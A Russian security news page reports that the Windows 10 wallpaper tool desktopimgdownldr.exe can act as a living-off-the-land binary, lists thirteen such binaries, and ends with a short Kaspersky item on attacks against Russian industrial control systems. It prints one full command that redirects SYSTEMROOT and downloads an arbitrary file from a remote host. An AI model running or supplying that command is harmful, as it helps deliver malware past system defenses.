Механизм установки фона в Windows 10 позволяет загрузить вредонос

Екатерина Быстрова 03 Июля 2020 - 08:38

...

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Следующая главная новость »

Подписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Екатерина Быстрова 17 Мая 2024 - 18:11

Целевые атаки Таргетированные атаки Атаки на АСУ ТП Корпорации Лаборатория Касперского

АСУ ТП в России стали атаковать чуть реже, но более целенаправленно

Как выяснили специалисты центра исследования безопасности промышленных систем Kaspersky ICS CERT, в первом квартале 2024 года 23,6% компьютеров в сетях российских АСУ ТП столкнулись с проникновение вредоносных программ.

Интересно, что за этот же период в 2023 году таких устройств было 27,9%, то есть имеем снижение на 4,3 процентных пункта. Тем не менее такие атаки становятся более сложными и целенаправленными.

На конференции Kaspersky CyberSecurity Weekend прозвучала мысль, что более сложные кибератаки на АСУ ТП, даже если их меньше, способны нанести серьёзный урон промышленной сфере.

На инфографике ниже эксперты приводят долю компьютеров АСУ в России, на которых были заблокированы вредоносные объекты, по кварталам:

Некоторые отрасли в России отметились тем, что в них доля заражённых объектов оказалась выше, чем в среднем по миру. Взять, к примеру, строительство: 24,2% в нашей стране против 23,7% по всему миру. В инжиниринге и у интеграторов АСУ — 27,2% против 24%

Как отметили в Kaspersky ICS CERT, в России особенно наблюдаются атаки киберпреступников на интеграторов, доверенных партнёров и подрядчиков.

Самые основные векторы, как и прежде, — фишинг через веб-страницы и по электронной почте. В первом квартале 2024-го в России вредоносные ресурсы были заблокированы на 7,5% компьютеров АСУ ТП.

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Читайте также